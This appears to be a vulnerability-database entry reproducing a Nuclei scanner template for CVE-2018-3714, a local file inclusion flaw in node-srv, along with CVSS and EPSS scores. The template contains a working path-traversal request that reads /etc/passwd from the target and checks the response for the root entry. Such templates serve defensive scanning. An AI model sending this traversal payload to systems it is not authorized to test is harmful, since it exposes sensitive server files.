Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-3714
HistoryJul 05, 2020 - 3:49 p.m.

node-srv - Local File Inclusion

2020-07-0515:49:09
ProjectDiscovery
github.com
3

4 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:S/C:P/I:N/A:N

6.5 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

0.002 Low

EPSS

Percentile

55.6%

node-srv is vulnerable to local file inclusion due to lack of url validation, which allows a malicious user to read content of any file with known path.

id: CVE-2018-3714

info:
  name: node-srv - Local File Inclusion
  author: madrobot
  severity: medium
  description: node-srv is vulnerable to local file inclusion due to lack of url validation, which allows a malicious user to read content of any file with known path.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in the node-srv application.
  reference:
    - https://hackerone.com/reports/309124
    - https://nvd.nist.gov/vuln/detail/CVE-2018-3714
    - https://github.com/merlinepedra25/nuclei-templates
    - https://github.com/sobinge/nuclei-templates
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2018-3714
    cwe-id: CWE-22
    epss-score: 0.00182
    epss-percentile: 0.55562
    cpe: cpe:2.3:a:node-srv_project:node-srv:*:*:*:*:*:node.js:*:*
  metadata:
    max-request: 1
    vendor: node-srv_project
    product: node-srv
    framework: node.js
  tags: cve,cve2018,nodejs,lfi,hackerone,node-srv_project,node.js

http:
  - method: GET
    path:
      - "{{BaseURL}}/node_modules/../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c6dcba5a80d531172bcbe76cf9052a681d667523c95ff6b4d99e23983ea3858502201527bbd21f91361c26cff0ae14d3738eb0d6327c2d31549dadaeb08f2784f71c:922c64590222798bb761d5b6d8e72950

4 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:S/C:P/I:N/A:N

6.5 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

0.002 Low

EPSS

Percentile

55.6%